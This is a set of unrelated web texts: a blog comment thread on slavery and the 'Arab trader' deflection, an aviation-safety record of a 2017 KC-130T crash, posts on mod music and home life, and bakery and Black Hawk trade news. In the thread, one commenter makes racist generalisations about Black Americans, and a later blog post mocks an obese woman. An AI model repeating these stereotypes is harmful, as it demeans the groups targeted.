How long? How long are we going to keep the slavery guilt thing going? Who does it help? Was my father a slave holder? ( N0 ) Was my grandfather a slave holder? ( No ) Were my great grand fathers slave holders? ( No ). Did I personally benefit from slavery ( No ) Have I been punished because of slavery? ( Yes ) Is that justice? ( No ) Does every person of color have the same opportunity or more that I, a white man? ( Yes ) Do Black’s disproportionately choose to have children out of wedlock, use drugs, drink alcohol in excess, commit violent crimes, engage in risky sexual behavior, and drop out of school? What causes their behavior? ( You tell me, but its a choice I choose not to make ) Blacks who don’t make those choices do quite well, and are often hated on by their own people. Are you going to call me a racist for my honest observations and opinions? ( Yes ). That is your problem not mine. Michael Jackson wrote a song about the Man in Mirror, and I’m not standing behind him when he wrote it. He in fact was a victim of his own sad choices.
I thought that Joseph Cinqué and his fellow Amistad mutineers were returned to their native Sierra Leone.
http://en.wikipedia.org/wiki/Joseph_Cinqué
@ Bic Bickel
How long did American Slavery last? And when slavery was finally outlawed, was there justice and equality for Black Americans following slaver… or was there something else?
Please be brave enough answer honesty.
“When I first jumped in, I was talking about the dishonest people who are most vociferous in their condemnation of white slave trade and give at most a slap on the wrist for everyone else……”—I get that, but does it really change anything I said? You called it intellectual dishonesty and that really is more what you are engaging in.
“Don’t play coy. Birds of feather flock together. The people who go HYUCK HYUCK WHITE COWBOY! FAUX NEWS! Will be the same ones who overlook non-white atrocities in favor of emotionally appealing white ones.”—I am not being coy and those are your words not mine. Unless I decided to tell you what I think or believe it is just noice and foolishness on your part to continue to assume.
“It’s generally a good bet, see above response with people of generally the same mindsets congregating.”— A bet is nothing more than a good bit of guess work, but based on your logic then you being here means you believe the same thing as those above…right?
“No but I do have eyes and I’ve observed most slavery talk centers around one kind that happened in the past. Your experiences may be different.”— Of course we have different experiences but because you say so does not make your experience any more credible than the homeless man on the street. It also does not change that you engaged in intellectual dishonesty no matter how you explain it.
“Why not both? The purpose of bringing it up in one context (online thread) is to see if one’s opponent is true to the principles of their anti-slavery rhetoric or will rationalize other trades away due to their white biases, the purpose of bringing it up in another context (real life) is for the benefit of any observers present.”—I have no problem with it being both but I have a problem when people fail to be consistent. If it is for both reasons then simply state that. As to the reasons both can be a reason for online and offline settings, but none of which you would know if it is or is not the reason unless you can read the minds of the individuals that chose to use it in an argument. This may simply be your reasoning alone.
“the Arab Trader is useful for dispelling the mythical quality of the white tyrant, and while not excusing his crimes, it shows others not like him were just as fallible and prone to cruelty”—I disagree because this solely depends on if you are talking to someone who already knows about slavery vs someone who has no clue. In most cases that I have witnessed the person brings this up even when they are talking to people who clearly know about other forms of slavery thus your reasoning is lost when dealing with those type of people. In this blog most if not all people in here know about other forms of slavery, so when the arab slave trader argument is brought up it simply becomes a deflection and not a means to let other know that others did it too. Even if it was a matter of the individual not knowing about it then it still becomes others did it too as the individual is seeking to place blame rather than acknowledge a wrong (this excludes those that actual do acknowledge).
“I never said as much, only that once that one person says “I agree, black slavery was bad.” then there’s no point in going “Well! Don’t you feel baaad about it!? Guilty?” to that one person.” — Then based on what you said is a bit confusing. What one person are you referring to? One out of the two people debating or one person in a group full of people discussing the issue? Based on your example the debate is then over and the other half is a last minute retort, but we are not talking about someone who simply makes the statement “I agree, black slavery was bad” and is then done. We are talking about someone who uses a deflection tactic such as the arab slave trader argument to point the finger elsewhere.
correction noise
“while not excusing his crimes, it shows others not like him were just as fallible and prone to cruelty”—based on the definition of excusing then I would have to say you are incorrect. If said wrong was done and a person says “but such and such did it” then that is excusing on the bases that others did it. Sure it points out others who did it, but it is still a good old pass the blame game and nothing more.
on Sun Apr 27th 2014 at 00:33:23 B. R.
Kungpow and Bic Bickel, see, its interesting that guys like you can be in denial of just how things have gone down in America…how at every step, obstacles and opresions are thrown into black Americans path…if slavery wasnt enough, after slaves were freed, they didnt get any benifits or help to really get going..carpet baggers came in and raked over everything and just when black Americans actualy got positions in the South after the war, Jim Crow came along, enforced by the absolutly violent racism of the Klan,and huge amounts of lynching. In the north, the draft riots demonstrated the northern kind of hate and racism towards black Americans…
As each decade went down, the face of white racism , with the legacy of slavery, kept rising its ugly head, from white flight and realaters in colusion with government created ghettos…the heavy huge southern migration in the fifities absolutly exasperated already strained forced black neighborhoods
i mean when i was born, maybe a year before, they just integrated baseball…i mean really , its just not that long ago that the most incredible , low leval, unbeleivable opressive racist discriminations went down ..and still raises its ugly head with the question we all should ask, how is racism going down today that we just dont perceive…like back in Jim Crow days where everyone takes it for granted its suposed to be that way
yes, the legacy of slavery still exists in Ameria, it exists in all the Americas that brought slaves from Africa to the Americas, Brazil has the same problems because of these festering wounds..
and Kungpao, (is that you duck?) ,Fox news and their followers are in denial about this legacy of slavery and how it is like a festering wound…when as Americans are we really going to take responsibility for this? Its just the right thing to do…take responsibility for these wounds we have left in various groups of people…but, black African slavery brought to America is absolutly a very deep wound that requires a special attention to the size it took on and the depth of what the reality is , and for the absolutly enormous contributions to our cultures made by desendants of slaves from Africa …ripping huge amounts of people from their homes and bringing them a long way and destroying their identity and culture is something that really is in denial by a lot of white people in America
this is a festering wound…you can see it in Brazil too…it could be dealt with if we all just took responsibility for what went down…whether we had slaves or not, or are racist or are not..its our society…do we want to just let a festering wound just keep going and get infected…its just plain as the nose on our faces that these are the reasons and origins for the problems we see plauging our societies that had large slave populations brought over from Africa in the Americas
I just looked at Bic’s comment as an example of deflection on a post that is not even about slavery but a weak argument used against it. I have found that white people end up bringing up slavery just as much if not more so than blacks in an effort to try to defend against just about any argument or accusation.
Cinque:
http://en.wikipedia.org/wiki/Joseph_Cinqu%C3%A9
Are you going to call me a racist for my honest observations and opinions? ( Yes ).
Yes. Observations are like anuses everyone has one, yours happen to be racist that’s all.
Thank you much, Herneith, That wiki account was certainly an interesting (??) read.
I’m somewhat wary of the agenda of those who formed the references that wiki cited, especially the suggestion/suspicion that Cinque and others in his captured parties actually becoming slave traders themselves after returning to Africa.
“The latter charge derived from oral accounts from Africa cited by the twentieth-century author William A. Owens, who claimed that he had seen letters from AMA missionaries suggesting Cinqué was a slave trader. Although some of the Africans associated with the Amistad *probably* did engage in the slave trade upon their return, most historians agree that the allegations of Cinqué’s involvement are not substantiated.”
“probably…” ??????????
If this allegation were factually true, one stills wonders why what would’ve caused those who were captured and targeted for slavery desiring to send others that looked like them into that external hell.
{{Does anyone have a Time Travel apparatus I could borrow?}}
Thanks again, Herneith!
“How long? How long are we going to keep the slavery guilt thing going?”
You are looking at slavery in an extremely self-centred way – making it about your feelings. It seems you would have me shut up about an important part of the country’s history just to spare your feelings. Is that what you are saying?
https://abagond.wordpress.com/2009/11/17/the-feelings-of-white-people/
Thank you, King.
I agree that Bic Bickel made it about his feelings. I don’t see anyone advocating that we should feel *GUILTY* about slavery and slavery’s aftermaths.
Facing up to the effect that slavery and genocide had on today’s society is simply looking at it squarely in the face, not sweeping it under the carpet and trying to delete it from our history books. And it is not about feeling guilty.
I beseech all Americans who are inclined to feel guilty about the slavery and genocide that white people perpetrated on its fellow residents to STOP FEELING GUILTY and start acknowledging the effect it has on its current day residents. Do not erase or whitewash the history. Acknowledge what needs to be done besides affirmative action and reparations to survivors.
on Sun Apr 27th 2014 at 16:16:53 Mary Burrell
@jefe: Well said.
I agree with Jefe. White guilt probably does more harm than good. It leads to whitewashed history, to deflections like the Arab Trader argument, to the vicious circle of racist thought and action.
[…] Africans sold their own into slavery. The Arabs traded slaves too! […]
on Wed Sep 23rd 2015 at 21:16:38 Victor Lee
Hello! I’m Victor, and this blog is awesome. I think you debunked that argument 100%. It’s basically a straw man in my view.
on Wed Jun 22nd 2016 at 03:10:57 mike4ty4
Another thing that racists don’t get about the Arab Trader argument:
It proves that Whites are no better than anyone else.
on Tue Jul 5th 2016 at 16:00:53 kungfurandablog
new commentator here and I agree completely with the previous posters above me. Moral deflection is something that I see white Americans engaging in a lot when they’re caught with their pants down (figuratively speaking of course). It’s like saying that since everyone else is lying then it’s okay to lie too.
And Kiwi, you’re totally right about that tactic that whites use to shut Asian-Americans up when they point out racism. Just recently, I was on a website and someone in a thread that I started about digital yellowface also used that same tactic to try to get me to shut up. I rightly called him out on it. I think it was a he. Both white American men and women that I encountered online use this tactic so I don’t know but often it’s the white American men (or should I say boys since men know how to take responsibility for their words) that resort to this kind of thing when they can’t handle the truth from a POC.
on Wed Oct 5th 2016 at 03:22:02 Benjamin
I would never mention the Arab Slave Trade to justify any White evils. However, I would mention it to counter somebody if they stated that Whites were the only ones to have committed slavery. And yes, while they might not be on this blog, there are people who do believe that only Whites have committed things like slavery and ethnic cleansing. And if confronted by such people, I see nothing wrong with providing examples proving such a belief is incorrect.
I would be interested in you mentioning the Arab Slave Trade.
Before you do, could you please clarify what you mean or understand by the ‘whites’ who have committed slavery and what does ‘Arab’ mean in the ‘ Arab Slave Trade’?
on Sun Feb 11th 2018 at 22:24:05 Yes, Africans DID Own White Slaves, BUT… | BROTHA WOLF
[…] of one of humanity’s odious practices whenever white racism is discussed. Fellow blogger Abagond coined it the ‘Arab Trader Argument’, a tactic that (mostly) white people use to deviate from the sins of Caucasians by bringing up the […]
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Status: Final
Date: Monday 10 July 2017
Lockheed KC-130T Hercules
Operator: United States Marine Corps
Registration: 165000
Total: Fatalities: 16 / Occupants: 16
Aircraft damage: Destroyed
Aircraft fate: Written off (damaged beyond repair)
Location: 11 km (6.9 mls) WSW of Itta Bena, MS ( United States of America)
Phase: En route (ENR)
Nature: Military
Departure airport: Cherry Point MCAS, NC (KNKT), United States of America
Destination airport: El Centro-Naval Air Field, CA (NJK/KNJK), United States of America
A United States Marine Corps (USMC) Reserve Lockheed KC-130T Hercules broke up and crashed in the vicinity of Itta Bena, Mississippi, USA. All 16 on board were killed.
The aircraft originated from Marine Corps Air Station Cherry Point, N.C., 1t 14:07 hours to transport personnel and equipment to Naval Air Field El Centro, California.
While the aircraft was flying at 20,000 feet, the number four blade from the number two propeller departed and sliced through the left side of the fuselage, and impacted the interior of the right side, initiating the catastrophic sequence of events. This impact caused the skin of the aircraft to separate along the starboard side. The energy transferred from the propeller blade's impact through the structure of the airframe also caused an overload condition of propeller three's drive shaft. This resulted in its associated reduction gearbox assembly (RGA) failing and the separation of propeller three from the aircraft. Propeller three then momentarily embedded into the upper right section of the fuselage. After which it continued over the aft starboard section of the fuselage and impacted the starboard horizontal stabilizer separating a significant portion of the stabilizer from the aircraft.
The aircraft structure forward of the wings then began to separate, resulting in the cockpit section separating and creating a trail of debris. The absence of the cockpit resulted in the forward section of the central fuselage creating a violent nonaerodynamic drag moment, which exceeded engineering tolerances and greatly accelerated fuselage break up forward of the wing box structure. The fuselage section from the wing box structure aft, continued to fly in a general southwest direction with enough dynamic stability that allowed the fuselage to reenter a downward attitude until final impact in a soybean field.
Probable Cause:
The investigation determined the cause of the mishap to be an inflight departure of the number four blade from the number two propeller. This propeller blade (P2B4) liberated while the aircraft was flying at a cruise altitude of 20,000 feet . The liberation of P2B4 initiated the catastrophic sequence of events resulting in the midair breakup of the aircraft and its uncontrollable descent and ultimate destruction.
Post-mishap analysis of P2B4 revealed that a circumferential fatigue crack in the blade caused the fracture and liberation. This fatigue crack propagated from a radial crack which originated from intergranular cracking (IGC) and corrosion pitting. The analysis also revealed the presence of anodize coating within the band of corrosion pitting and intergranular cracking on the blade near the origin of the crack. This finding proves that the band of corrosion pitting and intergranular cracking was present and not removed during the last overhaul of P2B4 at Warner Robins Air Logistics Complex (WR-ALC) in the fall of 2011. The investigation concluded that the failure to remediate the corrosion pitting and intergranular cracking was due to deficiencies in the propeller blade overhaul process at WR-ALC which existed in 2011 and continued up until the shutdown of the WR-ALC propeller blade overhaul process in the fall of 2017.
The investigation also examined whether any operational or intermediate level maintenance inspections or maintenance actions exist which could have detected the underlying causal conditions prior to the mishap. The investigation concluded that while these inspections exist, it cannot be quantifiably determined that these inspections would have detected the causal condition. The
investigation arrived at this conclusion due to the fact that the growth or propagation rate of an IGC radial crack cannot be predicted. Though no evidence exists to determine when the radial crack had grown to a detectable area, beyond the bushing, there exists a distinct possibility that it could have been detected if the radial crack had grown past the bushing and the off wing eddy current inspection was performed.
Accident investigation:
Investigating agency:
Status: Investigation completed
Accident number: Final report
Download report: Final report
Loss of control
» USMC Press Release
» Military Times
» Marine Plane Had Emergency at High Altitude, General Says (New York Times, 12-7-2017)
accident date: 10-07-2017
type: Lockheed KC-130T Hercules
Video, social media
This map shows the airport of departure and the intended destination of the flight. The line between the airports does not display the exact flight path.
Distance from Cherry Point MCAS, NC to El Centro-Naval Air Field, CA as the crow flies is 3543 km (2214 miles).
Accident location: Exact; as reported in the official accident report.
Lockheed C-130
319th loss
200th fatal accident
45th worst accident
» safety profile
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Posted on January 4, 2011 by baggingarea
I love mod. I love the whole aesthetic- the clothes, the shoes, the coats, the hair, the outlook. It’s old hat I guess, but it’s made a deep impression on me, increasingly as the years go by. I was just old enough to be affected at some level by the Quadrophenia inspired mod revival of the late 70s, although I couldn’t claim to have been an eleven year old mod. Like Roots Manuva said ‘Brand new, you’re retro’- if you don’t want to dress like every other bugger in suburban south Manchester but want something that can work on a daily basis, mod works. I often find myself cooing at over-priced vintage coats, desert boots, Chelsea boots and brogues, three button jackets, striped blazers, the stuff in the Fred Perry Outlet.
One of the great things about the mod story is that the original mods of the late 50s and early 60s loved modern Black American music- r ‘n’ b, modern jazz, blues. Every mod revival since has been primarily guitar based, mainly due to the sounds created by the 60’s mod bands, who took their love of soul and r ‘n’ b and shook it up with guitar, bass and drums, The Who and The Small Faces being the best known. Ironically the source material isn’t too far away from the starting points of rockabilly, who favoured their Black US jump music crossed with country, but that’s an aside. In the 90’s Oasis and Blur and a succession of major label ‘indie’ bands pillaged mod for looks and stylings. A few years previously the Acid Jazz scene borrowed heavily, with a more authentic stress on Black American influenced dance music. The Jam did more than anyone to popularise it before that, and Weller had to reject it and his army of parka’d followers to move forward but The Style Council were as mod as anything else he did. As was the more trad mod stuff of the 90s- Wild Wood, Stanley Road et al. What I think some people have found suspect about it is the sense of style over substance, that the clothes were the most important aspect- but most British music/youth movements have been based around dress, which was one reason why everything seemed so dull, from say 1996, through to the early 00s. No tribes, no rules, no style. The last genuine, groundshaking youth movement in this country was acid house, and that had it’s own look and aesthetic, just as strong as mod. I suppose mod’s various revivals have been associated with guitar rock rather than forward looking dance music, which tends to attract a laddish audience and everthing that goes with that. More’s the pity.
In the 60s The Creation released several great mod records. Eddie Philips pioneered playing the guitar with the violin bow (and look what that led to). They looked sharp. They made music that was ‘red with purple flashes’.They had some great tunes, including this one- Biff! Bang! Pow!. This is souped up r ‘n’ b. It also gave Alan McGee the name for a short lived band and ultimately the name for his record label. Dig it. Youth explosion.
Biff! Bang! Pow!.mp3
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Coultons takes its Sunbake range into the rolls market
Vince Bamford · 26 June, 2019
Coultons has extended its Sunbake bread range with the launch of an eight-pack of sliced white rolls.
Sunbake made its debut in February with four 800g square-top, white and wholemeal loaves in medium and thick versions. It was developed to offer new products for its core customer base of convenience retailers, explained the business at the time.
Coultons said the loaves’ launch had been a success and had already had a “significant impact” in the market, according to managing director Howard Hunter.
“Private-label is continuing to show growth in national data and this is primarily at the cost of the major brands as the disparity of retail pricing becomes evident in supermarkets and discounters versus convenience retail,” he explained.
“Sunbake is successful, we believe, as it starts to correct that imbalance by providing exclusively to the convenience retail market a private-label solution for that market.”
Coultons commercial director Graham Mahon added that the Sunbake 800g range had exceeded expectations.
Established in 1987 and operating from six depots, Coultons is a family-owned bakery distributor covering the north of England and north. It distributes major bread brands and own-label bakery items to convenience retail, catering and onward distributors.
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Sikorsky Delivers 1000th H-60M Black Hawk Helicopter to U.S. Army
Business Aviation in Slovakia
Sikorsky delivered the 1,000th H-60M Black Hawk helicopter to the U.S. Army today in a ceremony held in Stratford, Connecticut.
The event was attended by distinguished guests from the U.S. Army, government officials, the Defense Contracting Management Agency, industry suppliers, and Lockheed Martin employees.
Speakers included Brigadier General Robert L. Marion, Program Executive Officer, U.S. Army Program Executive Office for Aviation; Colonel William “Billy” Jackson, Project Manager, Utility Helicopters, U.S. Army Program Executive Office; Connecticut Governor Dannel Malloy; U.S. Senators for Connecticut, Richard Blumenthal and Chris Murphy; U.S. Representative for Connecticut’s 3(rd) Congressional District, Rosa DeLauro; and Sikorsky President Dan Schultz.
During the ceremony, Brigadier General Robert L. Marion said:
“The UH-60 is often referred to as the workhorse of Army Aviation and as such your efforts here, past, present, and future are critical to the continued defense of our nation. The rollout of the 1000th UH-60M Black Hawk marks an important outcome of our Aviation Modernization Plan, and these aircraft will transform our aviation fleet to a more flexible, capable, and ready team.”
Sikorsky delivered the first UH-60M Black Hawk helicopter in 2007 and the first HH-60M MEDEVAC helicopter in 2008. Today’s ceremony marked the delivery of the 792(nd) UH-60M and the 208(th) HH-60M helicopters. The ‘Mike’ model helicopters represent the Army’s third standard baseline H-60 Black Hawk aircraft version in the 38-year production history of the program. The newest models feature more powerful engines than older variants, a new airframe, avionics and propulsion system, improved rotor blades, a digital cockpit, and an autopilot among other modern enhancements.
In his remarks, Colonel William “Billy” Jackson said:
“Providing the Wings of the Eagle is a solemn responsibility. I am proud to report that this program has delivered many important attributes to our warfighters including more power, more durability and vastly increased situational awareness. We have fielded a fully integrated system…a machine that allows our warfighters to focus on the battlefield. These attributes improve not only our performance, but also our combat readiness.”
Currently, there are 2,135 H-60 Black Hawk helicopters in service, making the Army’s Black Hawk helicopter fleet the largest flying fleet of all the services. The Army fleet of Black Hawk helicopters of all models has flown nearly nine million flight hours, many of them in combat.
The U.S. Air Force, National Guard, Army Reserve and 10 militaries throughout the world fly H-60M model aircraft. U.S. Government agencies including the Department of State, Customs & Border Protection and the Federal Bureau of Investigation also are operators.
“I know that I speak for all of our employees, many of us military service veterans, when I describe the tremendous pride we feel today,” said Dan Schultz, president of Sikorsky, A Lockheed Martin Company.
“We are honored to provide our country’s men and women in uniform with a proven multi-role aircraft they can count on to perform their missions every day.”
The UH-60M Black Hawk helicopter has been purchased by several international militaries, through the U.S. Government Foreign Military Sales (FMS) program. The U.S. Army has active H-60M BLACK HAWK programs with Bahrain, Jordan, Mexico, Saudi Arabia, Slovakia, Sweden, Taiwan, Thailand, Tunisia and United Arab Emirates.
Sikorsky delivered the UH-60A Black Hawk helicopters from 1978 until 1989, and delivered the UH-60L from 1989 until 2008. The Army plans to keep the Black Hawk fleet flying through 2070.
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When Yorkshire Pudding won £7.5 million pounds on the UK National Lottery, he decided to host a party specifically for all the bloggers he had encountered on the web in the previous twelve months. All transport and accommodation costs were paid for and Mr Pudding even arranged to cover wage costs with the employers of any bloggers who were actually in work.
The party was held in a big marquee in Endcliffe Park, Sheffield. It was last used by the Beckhams when they threw their celebrity pre-World Cup bash in Sawbridgeworth. On the day of the party, YP waited nervously inside the tent, checking that everything was ready. On stage, Bruce Springsteen was tuning up. "Turn that f*!?*!g row down!" yelled Mr Pudding as he surveyed the canapes and the free drinks bar, "I'm The Boss now matey!"
Then the guests started arriving. Arthur Clewley was the first in. Wheelchair-bound with yellow drool dripping from his chin, his long-suffering wife Elsie pushed him straight to the bar where he ordered a Babycham and a pint of Irish stout for Elsie.
Looking surprisingly unjetlagged, but fresh in from Seattle, Brad the Gorilla bounced into the marquee in his fake gorilla suit. He hugged Mr Pudding, obsequiously declaring how much he looked up to him as a blogging trailblazer. "I am not worthy!" grinned Brad. Loitering behind him was the delicious Alkelda - author of "Saints and Spinners". Fluttering her eyelashes, she immediately tried to seduce the happily-married Mr Pudding. Though tempted by her feminine wiles, he pushed her away as if she were no more than a Verifican goatherd. "Get off me shallow wench! You're only after my millions!"
The night started to swing. Springsteen's set was amazing. Down at the front, Reidski was bopping away like a madman, his wild "Braveheart" hair flailing all over the place as he and his beloved JJ lost themselves in the music but later they smooched like teenagers when the band attempted a New Jersey version of "It Must Be Love". "It's all a load of cobblers to me!" chuntered Arthur Clewley in the corner.
Yorkshire Pudding was over at the bar guzzling
pints of Tetley with a bunch of American bloggers including his old buddies "By George" and Amy Fridays-Web. "Just a minute," whispered Pud, lifting Friday's long brown tresses to inspect her neck, "as I thought, as red as a beetroot!" "Yup! Weez all rednecks down South!" grinned George, displaying her ruddy nape.
A fight broke out near the Gents loo. Steve from "Occupied Country" and "Shooting Parrots" - both from Lancashire - were beating seven bells out of Ilkley's resident hippycook, "Yorkshire Soul". Pudding steamed in to assist his compatriot and as in the War of The Roses, the Lancastrian wimps were driven back to their dominoes. "What was all that about lads?" said mine host. "He said he'd had more hits on his blog than both of us put together!" sniffled The Parrotman.
In spite of their marital status, Krip from Gillingham and Martin from York were trying to chat up two of the female transatlantic guests - Kara from Georgia and Zandrea from Boston. The American ladies couldn't understand a word the lads were saying so Yorkshire Pudding came over to translate but before he could get a word out, into the marquee burst Australian blogger Dirk, creator of "Arm The Insane". "Jesus Christ, I feel as dry as a kangaroo's jock strap!" he uttered before visiting the bar for a bucket of Fosters, bumping in to The Retarded Rugrat from Vancouver who was smooching with her darling Jeff.
And so it went on until the early hours. There was dancing, revelry, quaffing of beer, necking of bottles, debate about blogging techniques and etiquette. Every blogger present was given a framed and signed photograph of Yorkshire Pudding who was lifted on to the stage in a wave of excitement as all the bloggers together sang, "For he's a jolly good fellow!".... And England won the World Cup!
Winner of the "Weekend" Silly Blog Post Award for June 2006
- June 28, 2006 12 comments:
You've heard of the Michelin Man, now here's the Michelin Lady - courtesy of Macdonalds, Pizza Hut, lard sandwiches, pure unadulterated greed and some kind of personality disorder.
Caption anybody?
Hells bells! A full year has passed since I began this weblog. What an adventure into the unknown it's been! Like Brad the Gorilla, my transatlantic adversary, I don't know if I'll have another year's worth of stuff to write or another year's worth of enthusiasm. This is what I wrote in my very first entry twelve months ago....
"So this is England in mid-summer. Lovely warm weather and you know what, they're all bloody well complaining! "Oooo it's too hot!" "Open a window!" "Oh I feel faint!" Whingeing whining wimps! I just love to barbecue, walk out in shorts, sweat, wear flip flops. If only all of our summers had long hot spells like this! Leather on willow. Swallows performing acrobatics in the evening sky. A glass of ice cold light white wine with condensation running down the side. "Oh! It's too hot! I couldn't live in a foreign country if it's like this!" As my old mate Trog used to say - Knickers! Knockers! Knackers!"
Trog was a neighbour who became a dear friend. He died two years ago of lung cancer. I will always remember him in his dressing gown, holding up a twenty pack of cigarettes to show me the government warning on the side - Smoking Kills. "It's true you know", he said with a wicked grin. He was such a character and such a kind and decent man. Now there are new people living in his house - people who occupy his space but never met him or care one iota that he was once with us. I guess that's life...or maybe it's death. Rest in Peace Goronwy "Trog" Evans.
- June 25, 2006 6 comments:
A life filled with regrets would be the shadow of a life, hemmed in by self-doubt, fruitless longing and if-only’s. And yet as we grow older and look back upon youth, from time to time we may consider how different things might have been. How might we have done it differently if the tape of one’s life could be rewound? I guess that what I am leading to is another “meme”. If I could have my time again…
1. I’d have played rugby through university. I was naturally good at rugby. I represented Hull and East Yorkshire from the age of thirteen through to eighteen and yet at university I scorned the rugby club crowd. I was stupidly cooler than them and I neglected this sporting talent till it was far too late.
2. I would have never smoked tobacco. I didn’t start until I was twenty one and I smoked until I was thirty four – twenty a day. What a waste of money and breath! Now I actively hate the foul aroma of stale tobacco and I’m 100% behind any moves that are made to drive this horrible habit into extinction.
3. At the age of twelve/thirteen I would plonk myself next to the beautiful Susan Hawkins on the schoolbus into Hull and I’d tell her how I felt about her and how I’d love to kiss her pouting lips and be her first boyfriend instead of suffering like a fool month after month, tongue-tied and utterly self-conscious.
4. When my left testicle started to enlarge at the age of twenty, I’d have gone straight to a doctor for a diagnosis instead of spending a year fretting and hoping it would go away and feeling like a condemned man. It turned out to be a “hydrocele” – a benign and watery growth that was easily removed via minor surgery. How stupid I was.
5. I’d practise more often and more determinedly to improve my guitar playing and I’d have written songs all the time, never leaving my guitar hanging on a hook or shut up in a wardrobe gathering dust for months on end. I’d nourish this talent and help it to grow.
6. When at two thirty a.m. some time in 1975, the lovely Kate Thompson invited me to run west with her across the open fields until the morning came, I would run with her for the hell of it and because she loved me and through running with her I know in my heart we would have found something out there but instead I declined and rolled over.
7. I wouldn’t have fallen asleep at the Isle of Wight Festival, missing The Doors entirely. I still can’t believe that that happened but in my defence I was extremely tired – I’d been grooving to the music for forty eight hours solid – Hendrix, Leonard Cohen, Free, Jethro Tull, Joni Mitchell, Richie Havens, Donovan – amazing!
8. I wouldn’t have trained to be a teacher. Instead I’d have tried to forge a career in advertising where I think I’d have not only been successful but I’d have a found a great outlet for some of my creative energies. Teaching can be so stifling. You’re giving out all the time and working with children impacts upon the way you are with other adults,. Over the years, I have grown to detest rudeness, ingratitude and idleness and the humdrum conveyor belt-like nature of the school year. And I hate all the “experts” and politicians and gravy train passengers who attach themselves to education like monstrous barnacles on the hull of a great ship.
9. I’d have dodged the cricket ball that smashed my front teeth at the age of fourteen and took away the confidence from my smile – perhaps impacting on the way some people have assessed me over the years, maybe even having a negative effect upon my so-called “career”. Good smiles are precious – they leave positive first impressions.
10. I’d have more of the state of mind that I have now – stronger, more “at peace” with myself, more battle-hardened, more aware of my virtues, less inclined to bother what anybody else might think of me, relishing simple things like the rising of the moon and the Friday night curry. And maybe I’d have emigrated to America where I have always felt so much “at home”.
As a child, I had the language of manners drummed into me. What do you say? Errr... oh yeah.. thank you, thank you very much. And what's that magic word? Errr... yeah... please, please that's it! That's the magic word. The drill was to use these words where ever you went. Speeding ticket? Thank you officer! Toilet visit? Please may I go.
Actually I think these words are a bit over-rated. Using "please" and "thank you" is all very well and good but these tags can be used without genuine intent. They can be mere language habits that you exude simply through training. Showing gratitude should be felt and meant - so should requesting someone's service via "please". You can say "please" and "thank you" with vicious resignation when they should be uttered with real human feeling, a real sense of the "other" human being with whom you are in communication.
But manners is about much more than these words. Manners is about valuing and respecting the people that we all have to live amongst. One of the main tenets of my life is that I am everybody's equal - I'm not better that anybody else and nobody is better than me. I don't care how rich you are or how poor, how clever or stupid, how famous or unknown, how young or old, how masculine or feminine, how tall or small, how black or white - you're just my equal that's all. And everybody has their own story to tell, we are all products of genetics, environment and perhaps the choices we made when we arrived at crossroads in our lives. There but for the grace of God go I.
I hate ignorance and bullying. These characteristics typify people who lack basic manners. We might sometimes say - "Manners cost nothing but they are worth a lot". Manners prove we recognise that we are members of a society that connects us, makes us interdependent.
So don't try and push in front of me in a queue or you'll feel my wrath and I may not say "thank you" when I ask you to move your ass. And don't expect me to say "please" when I am claiming my rights. And when I fart or sneeze or belch I won't beg your pardon - these are involuntary physical expulsions for which I make no apology. But I will always try to say "sorry" and mean it when I have made a mistake because that is an important element of manners which demonstrates that at times human beings can be as selfless as they are selfish.
Like many houses in Sheffield, our house is on a hill. Of all the cities I have ever been in - only San Francisco can compare with my adopted city in that respect. Last October we visited Rome with its seven "hills" but to me that seemed a pretty flat city with minor gradients - nothing like Sheffield.
In our sunny west-facing back garden we had a little patio, paved with huge Yorkshire stone slabs and a metre of block paving that I added to extend the patio ten years ago. Trouble was that because of the hill, this patio was never entirely level. When we put our picnic table on the patio, stuff would slide.
An English TV obsession is home improvement or D.I.Y.. Perhaps this is where we acquired the idea for decking over the old patio area. Two thousand pounds later and the decking is in place. We got a man who runs a little landscaping business to do the work. He had been recommended to us by one of the doctors that Shirley works with down at her health centre.
So often, tradesmen will let you down - overcharge or fail to keep their promises, leaving shoddy workmanship behind them. We're used to it. But this time we came up trumps and the job the guy has done is brilliant.
We had the vision of knocking out our old back room window, sticking in French doors and then having two levels of decking built with steps between. Mark - the landscape man - suggested a wrought iron ballustrade rather than wooden lats and so we went for that. We are so pleased we made that choice because it gives a lightness and style to the whole construction.
We have enjoyed some lovely summery weather in England recently and the benefits of our new decking have been noteworthy. The back room opens out onto an airy balcony overlooking the garden and the main decking area is completely level so that our new glass table doesn't slope any more and dinner plates don't slide.
I have manoeuvred some of the old slabs to lay a little path beneath the decking to our barbecue area and the compost bin. Perhaps the only downside of all this work - apart from shelling out a huge wodge of cash - is that you now have to bend down to access the underhouse workshop and storage area but we anticipated that and it's not really a big inconvenience.
So that's it - decking. This year's main home improvement project. I think we'll put off other major plans till 2007. It's amazing to think that in 1989 when we moved in - this house cost £60,000 - but now it's worth £220,000 - and that's another peculiarly English obsession - the "How Much Is Your House Worth" game. Perhaps we should just get on with living...
The World Cup is well underway now. I just watched Brazil beating Croatia 1-0. At times Brazil looked vulnerable but you couldn't help feeling that they were just operating in second gear, simply warming up for the rest of the tournament.
One thing that puzzles me is why the players emerge from the tunnel holding hands with little kids. This never used to happen but it has become an unquestioned ritual. Some of the players never even talk to the children they drag along beside them. I think it is meant to have something to do with "fair play" but why holding hands with a child should symbolise this is a complete mystery to me. I mean when police officers walk down the street they haven't got little boys and girls in tow. Judges in courts of law don't hold hands with children as they pass their wise judgements so why World Cup football?
Personally, I think they should pile all these little kids in a truck and drive them deep into the Black Forest. If they have read "Hansel and Gretel" they will surely find their way out of there, unless of course they meet a witch with a rather cool house constructed from confectionery products.
Mmmm! Imagine that! Waking up in the morning and chewing on the liquorice walls or the milk chocolate door frames!
England looked, well, rather ordinary against Paraguay on Saturday but we beat them 1-0. I think we are crying out for St. Wayne - Mr Rooney - to inject a bit of passion into the team. I just hope The Turnip (Sven) holds him back till the Sweden game - perhaps bringing him on as a second half substitute.
In the rear windscreen of my car, I have a homemade sticker that reads "Come on Togo!" next to an image of the bright Togoland flag. It's meant to act as a counterbalance to all the English flags gaily festooning vehicles owned or driven by these intellectually challenged serfs that I have to live amongst. Unfortunately, Togo were beaten by South Korea this afternoon but I expect them to thrash France who looked like they were on valium or maybe Thierry Henry's mother had died before their match with Switzerland.
England's match with Trinidad on Thursday will not be a walk over but if we win it we are through into the knock out phase, so COME ON ENGLAND!
On a sad personal note, Hull City have today said goodbye to their manager - Peter Taylor who has decided to join Crystal Palace in London - the crazy fool! But this now leaves an opening for me as The Tigers' new manager. I'm just waiting for the call....
